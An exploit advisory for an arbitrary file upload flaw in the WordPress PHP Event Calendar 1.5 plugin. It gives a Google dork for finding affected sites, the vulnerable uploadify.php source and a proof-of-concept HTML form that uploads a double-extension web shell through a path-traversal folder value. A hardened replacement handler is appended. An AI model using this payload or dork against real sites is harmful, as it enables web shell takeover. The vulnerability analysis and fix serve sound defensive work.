WordPress PHP Event Calendar 1.5 Arbitrary File Upload




#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar.com
#- Developer : -
#- Link Download : Wordpress.org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================

 &- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )


Bug Code :
<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);
if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    //$targetPath = $dir.$targetFolder;
    $targetPath = $targetFolder;
    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;
    // Validate the file type
    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions
    $fileParts = pathinfo($_FILES['Filedata']['name']);
    if (in_array($fileParts['extension'],$fileTypes)) {
        move_uploaded_file($tempFile,$targetFile);
        echo '1';
    } else {
        echo 'Invalid file type.';
    }
}
?>

&- When Vulnerable : *Blank*

Proof Of Concept :

Material : Sh3ll.php.gif (if support) / Upload image.gif


HTML Code : 

<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php"  method="post" enctype="multipart/form-data">
 <input type="file" name="Filedata" id="file" ><br>
 <input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
 <input type="text" name="user_id" value="3xploi7" id="file" ><br>
 <input type="submit" name="submit" value="3xploi7ed !" >
</form></div>

Shell Access ? Here
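
For comparison with the bug code above, a hardened form of the same handler, added here as an example: it is not the vendor's fix or the plugin's own code, and UPLOAD_DIR and pec_store_image() are hypothetical names. The destination is fixed on the server, the type is decided from the file content, and the stored name is generated by the server.

```php
<?php
// Added example, not the plugin's code. UPLOAD_DIR and pec_store_image() are
// hypothetical names; the 2 MiB limit is a constructed value.
const UPLOAD_DIR = __DIR__ . '/uploads'; // fixed server-side, never from the request

function pec_store_image(array $file, int $userId, string $uploadDir): string
{
    // Reject failed uploads and files that did not arrive as an HTTP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed.');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('File too large.');
    }

    // Decide the type from the content, not from the client-supplied name,
    // so a double extension such as "x.php.gif" never reaches the disk.
    $allowed = ['image/jpeg' => 'jpg', 'image/gif' => 'gif', 'image/png' => 'png'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Invalid file type.');
    }

    // Server-generated name: integer user id, random bytes, and the extension
    // mapped from the detected type. No request string becomes part of the path.
    $name   = $userId . '_' . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $target = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store file.');
    }
    return $name;
}

// Authenticate and authorise the request before this point (inside WordPress,
// a nonce check plus a capability check); the original script did neither.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['Filedata'])) {
    try {
        echo pec_store_image($_FILES['Filedata'], (int) ($_POST['user_id'] ?? 0), UPLOAD_DIR);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo $e->getMessage();
    }
}
```

Serving the upload directory with script execution disabled covers the case where an image polyglot is stored despite these checks.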

